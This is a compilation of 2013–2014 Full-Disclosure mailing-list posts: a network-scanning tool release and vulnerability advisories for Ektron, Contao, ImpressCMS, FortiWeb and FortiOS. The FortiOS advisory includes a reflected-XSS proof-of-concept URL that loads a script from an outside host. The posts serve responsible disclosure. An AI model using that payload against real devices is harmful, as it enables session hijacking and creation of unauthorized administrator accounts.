[Full-disclosure] pMap v1.10
Hey folks,

We just released a new version of pMap, our tool for passively discovering, scanning, and fingerprinting hosts on the local network.

Description: Discovery, Scanning, and Fingerprinting via Broadcast and Multicast Traffic
Platform(s): Windows (Includes a Metasploit script for remote deployment)
Version: 1.10
Date: 10/09/2013

New Features
- Additional Multicast DNS and SSDP fingerprints
- Excludes connected printers from fingerprinting process
- Displays any available service configuration

Download page: http://www.hellfiresecurity.com/tools.htm

Homepage(s)
- http://www.hellfiresecurity.com
- http://www.networkattackinfo.com/

Blog - http://www.networkattackinfo.com/dokuwiki/doku.php?id=blog
Author - Gregory Pickett
License - GNU General Public License version 3.0 (GPLv3)

Comments, bug reports, and/or feature requests should be sent to mailto:fg...@si6networks.com i...@hellfiresecurity.com. And if you are interested in contributing Multicast DNS or SSDP fingerprints, let us know.

Enjoy,
Greg

--
Gregory Pickett, CISSP, GCIA, GPEN
www.hellfiresecurity.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Ektron CMS TakeOver Part (2) - PayPal-Forward.com demonstration
As previously stated, I would post an update for Ektron CMS bypassing the security fix. A full step by step with the usual screen shots can be found at http://www.securatary.com/vulnerabilities

In this example, we use www.paypal-forward.com as a demonstration site. I would like to say that PayPal fixed this issue with their own workaround extremely quickly. Excellent work by their security / dev team.

All the best
Mark Litchfield
www.securatary.com
[Full-disclosure] [CVE-2014-1860] PHP object insertion / possible RCE in Contao CMS <= 3.2.4
Hi,

I have discovered a vulnerability that might lead to code execution in Contao CMS <= 3.2.4.

Contao CMS <= 3.2.4 does not properly validate user input in several locations, which is then passed directly into PHP's unserialize.

This has been fixed in Contao 3.2.5 as per commits:
https://github.com/contao/core/commit/8c9cb044bdc887a8202bb65a64545c025664f957
https://github.com/contao/core/commit/1717336598fdcf1ed3f4ad488e140147cb31516d

Announcements can be found at
https://contao.org/en/news/contao-3_2_5.html
https://contao.org/en/news/contao-2_11_14.html

Thanks to the Contao developers for being so responsive.

The full report can be found at my repo in https://github.com/pedrib/PoC/blob/master/contao-3.2.4.txt

Regards,
Pedro Ribeiro
Agile Information Security
[Full-disclosure] [CVE-2014-1836] Arbitrary file deletion in ImpressCMS 1.3.6 and two XSS issues
Hi,

I have discovered two vulnerabilities in ImpressCMS. These have been fixed in the new 1.3.6 version, which you can get at https://sourceforge.net/projects/impresscms/files/ImpressCMS%20Official%20Releases/ImpressCMS%201.3%20Branch/ImpressCMS%201.3.6/.

One is an arbitrary file deletion and the other is two cross site scripting issues. Note that I was unable to exploit the XSS issues due to the inbuilt protection module, but someone smarter / with more time might be able to do it.

The tickets containing the information are available here:
https://www.assembla.com/spaces/dW4voyNP0r4ldbeJe5cbLr/tickets?report%5Bestimate_show%5D=true&report%5Bid%5D=0&report%5Bmilestone_id_cond%5D=1&report%5Bmilestone_id_val%5D=4129593&report%5Btitle%5D=All+Tickets+for+%27ImpressCMS+1.3.6%27&report%5Btotal_estimate_show%5D=true&report%5Btotal_invested_hours_show%5D=true&report%5Bworking_hours_show%5D=true

The full report can be seen at my repo https://github.com/pedrib/PoC/blob/master/impresscms-1.3.5.txt

Thanks in advance, and thanks to the ImpressCMS team for being so responsive.

Regards,
Pedro Ribeiro
Agile Information Security
[Full-disclosure] XSS Reflected vulnerabilities in OS of FortiWeb v 5.0.3 (CVE-2013-7181)
I. VULNERABILITY
Reflected XSS vulnerabilities in the OS of FortiWeb v5.0.3
CVE-2013-7181
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7181

II. BACKGROUND
Fortinet's industry-leading Network Security Platforms deliver Next Generation Firewall (NGFW) security with exceptional throughput, ultra low latency, and multi-vector threat protection.

III. DESCRIPTION
A reflected XSS vulnerability has been detected in FortiWeb 5.0.3, in the parameter filter of /user/ldap_user/add, which allows arbitrary HTML/script code to be executed in the context of the victim user's browser and/or a session hijacking attack.

IV. PROOF OF CONCEPT
The application does not validate the parameter filter in /user/ldap_user/add.

V. BUSINESS IMPACT
This allows attackers to hijack the authentication of administrators.

VI. REQUIREMENTS
An attacker needs to know the IP of the device.
An administrator needs an authenticated connection to the device.

VII. SYSTEMS AFFECTED
Try FortiWeb VM or appliance v5.0.3

VIII. SOLUTION
Upgrade to FortiWeb 5.1.0 or higher.

By William Costa
[Full-disclosure] Fortinet FortiOS 5.0.5 contains a reflected cross-site scripting (XSS) vulnerability (CVE-2013-7182)
I. VULNERABILITY
Reflected XSS vulnerabilities in FortiOS 5.0.5

II. BACKGROUND
Fortinet's industry-leading Network Security Platforms deliver Next Generation Firewall (NGFW) security with exceptional throughput, ultra low latency, and multi-vector threat protection.

III. DESCRIPTION
A reflected XSS vulnerability has been detected in FortiOS 5.0.5. The code injection is done through the parameter mkey in the page /firewall/schedule/recurrdlg

IV. PROOF OF CONCEPT
The application does not validate the parameter mkey correctly.
http://IP_FORTIGATE/firewall/schedule/recurrdlg?mkey=a;SCRIPT SRC=http://10.0.1.120/xss/good.js;/SCRIPT

V. BUSINESS IMPACT
An attacker can execute arbitrary HTML or script code in a targeted user's browser, which allows arbitrary HTML/script code to be executed in the context of the victim user's browser, allowing theft of the CSRF token and thus enabling the creation of an Administrator user in the box for full access.

VI. SYSTEMS AFFECTED
Try FortiOS v5.0.5 VM and Appliance

VII. SOLUTION
Upgrade to FortiOS 5.0.6 or higher.

References
http://www.fortiguard.com/advisory/FG-IR-14-003/
http://www.kb.cert.org/vuls/id/728638

By William Costa
[Full-disclosure] H2HC 10 - FX Keynote Video is Up
Hello List,

I'm glad to announce that we finally published FX's Keynote Video at H2HC 10: http://youtu.be/FWTmfDsebNM

We've received an impressive amount of great feedback on this talk. Soon we are going to publish more talks, so follow us if you want to know more: @h2hconference

Our website (with this year's call for papers and more info): https://www.h2hc.com.br

Best Regards,
Rodrigo (BSDaemon)
https://twitter.com/bsdaemon